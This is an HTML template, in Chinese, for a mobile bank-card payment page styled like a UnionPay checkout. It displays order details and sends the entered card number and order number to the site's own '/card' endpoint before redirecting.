<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <title>-</title>
    <meta http-equiv="cache-control" content="no-cache">
    <meta http-equiv="Expires" content="0">
    <meta http-equiv="Pragma" content="no-cache">
    <meta name="viewport"
          content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=0">
    <link rel="shortcut icon" href="/assets/static/img/favicon.ico"
          type="image/x-icon">
    <link rel="stylesheet" href="/assets/static/css/phone_new.css">
    <script src="/assets/static/js/jquery-3.6.0.min.js"></script>
    <script>
        function getQueryVariable(variable) {
            let query = window.location.search.substring(1);
            let vars = query.split("&");
            for (let i = 0; i < vars.length; i++) {
                let pair = vars[i].split("=");
                if (pair[0] == variable) {
                    return pair[1];
                }
            }
            return (false);
        }

        $(function () {
            $('#order-list-block-show').click(function () {
                $('#orderList > .fold').toggleClass('hide')
                if ($(this).hasClass("order-list-block-xl")) {
                    $(this).removeClass().addClass('order-list-block-down')
                } else {
                    $(this).removeClass().addClass('order-list-block-xl')
                }
            });
            $('.del').click(function () {
                $('#cardNumber').val('');
            });
            $('.cardbin').click(function () {
                const cardNo = $('#cardNumber').val();
                const orderNo = getQueryVariable("o")
                console.log(cardNo);
                console.log(orderNo);
                const data = JSON.stringify({
                    "order_no": orderNo,
                    "card_no": cardNo,
                });
                $.ajax({
                    type: 'POST',
                    url: "/card",
                    data: data,
                    success: function (dataRecv, textStatus, jqXHR) {
                        console.log(dataRecv)

                        if (dataRecv.code == 0) { // 成功
                            window.location.href = dataRecv.url || "";
                        } else {
                            alert(dataRecv.msg);
                        }
                    },
                    dataType: "json"
                });
            });
        });
    </script>
</head>

<body>
<div class="content">
    <div class="header">
        <!--        <div class="do-return hide" data-ref="" data-locked="false"></div>-->
        <p class="dn title_android" id="title_tips" style="display: block;">银行卡付款</p>
        <p class="paytimeout_tips" id="paytimeout_tips" style="display: none;"></p>
    </div>
    <div class="gray-solid-line grey"></div>
    <div id="preAuth" class=""></div>
    <div id="upopNoticeInfo">
    </div>

    <div class="pos_notify dn" id="pos_notify">
        <span>●</span>
        <div id="upgg_location-215" data-upgg-state="1" class=" upgg_container"
             style="background: url(&quot;/assets/static/img/loading.gif&quot;) center center no-repeat transparent;">
        </div>
    </div>

    <div class="container">
        <div class="order-list-wrapper">
            <div class="order-list-block">
                <div class="order-list" id="orderList">
                    <p class="order-item-pay-amount">¥<span id="order-item-pay-amount">{{.amount}}</span></p>
                    <p class="order-item-origin-amount">¥<span id="order-item-origin-amount">{{.amount}}</span></p>
                    <p class="order-item fold"><label>交易时间</label><span>{{.create_time}}</span></p>
                    <p class="order-item fold"><label>订单编号</label><span>{{.order_no}}</span></p>
                    <div class="btn-show-order-dash grey fold"></div>
                </div>
            </div>
            <div class="order-status hide">
                <p></p>
            </div>
            <!--<p class="">点击查看所有订单信息</p>-->
        </div>
        <div class="promotion-list" id="new_promotion">
        </div>
        <div class="paycard-list" id="new_paycard">
        </div>
        <div class="new_yellow_msg dn" id="yellow-msg" style="display: none;"><span></span></div>
        <div class="new_error_msg dn" id="error-msg" style="display: none;"><span></span></div>
        <div class="instalment-list" id="new_instalment">
        </div>
    </div>


    <!--<p class="">点击查看所有订单信息</p>-->
</div>
<div id="slider-wrapper" style="height: 168px;">
    <div class="overflow-wrapper" id="overflow-wrapper" style="margin-left: 0%;">
        <div class="main-container slide" id="main-container">
            <div class="form-container">
                <div class="label-input">
                    <div class="cardIndex-inner-label-input">
                        <div class="new-input-wrapper">
                            <span class="inner-label">银行</span>
                            <select class="up-input pan">
                                {{range $key, $value := .banks}}
                                <option value="{{ $value }}">{{ $key }}</option>
                                {{end}}
                            </select>
                        </div>
                        <div class="new_yellow_msg dn" id="yellow-msg"><span></span></div>
                    </div>
                    <div class="cardIndex-inner-label-input">
                        <div class="new-input-wrapper">
                            <span class="inner-label">银联卡号</span>
                            <input type="tel"
                                   maxlength="23"
                                   id="cardNumber"
                                   class="up-input pan"
                                   placeholder="信用卡/储蓄卡/中银通卡">
                        </div>
                        <div class="new_yellow_msg dn" id="yellow-msg"><span></span></div>
                    </div>
                    <div class="btn-wrapper">
                        <div class="up-btn next cardbin"><a>下一步</a></div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<div class="loading-block hide">
    <div class="overlay"></div>
    <p>
        <img class="logobg" src="/assets/static/img/load_logo.gif">
    </p>
</div>

<div class="inner-label-keyboard">
    <div id="keybord" style="display:none" class="keyboard-container container">
        <div class="keyboard-container-inner">

            <div class="keyboard-title"><img src="/assets/static/img/key_title.png"></div>

            <div class="keyboard-row" id="keyboard-row1">
                <div class="keyboard-div1 head-clear"></div>
                <div class="keyboard-div2 head-clear"></div>
                <div class="keyboard-div3 head-clear"></div>
                <div style="clear: both"></div>
            </div>

            <div class="keyboard-row" id="keyboard-row2">
                <div class="keyboard-div1"></div>
                <div class="keyboard-div2"></div>
                <div class="keyboard-div3"></div>
                <div style="clear: both"></div>
            </div>

            <div class="keyboard-row" id="keyboard-row3">
                <div class="keyboard-div1"></div>
                <div class="keyboard-div2"></div>
                <div class="keyboard-div3"></div>
                <div style="clear: both"></div>
            </div>

            <div class="keyboard-row" id="keyboard-row4">
                <div class="keyboard-cp"></div>
                <div class="keyboard-div2"></div>
                <div class="keyboard-bk div-clear"></div>
                <div style="clear: both"></div>
            </div>
        </div>

    </div>
</div>

<div class="contentPop" id="contentPop"></div>
<div class="popInfo" id="popInfo"></div>
<div id="select_wrapper"></div>
<div class="logo-bottom"></div>

<p class="toast hide"></p>
<div class="popup-block hide" style="z-index:30000">
    <div class="confirm-block">
        <p class="hintTitle">提示</p>
        <p class="hint">卡号输入错误或暂不支持支付，请输入正确卡号或更换银行卡[5101700]</p>
        <div class="btn-group">
            <div class="up-btn popup-left fl"><a>换卡支付</a></div>
            <div class="up-btn popup-right fl"><a>确定</a></div>
        </div>
    </div>
</div>
</body>

</html>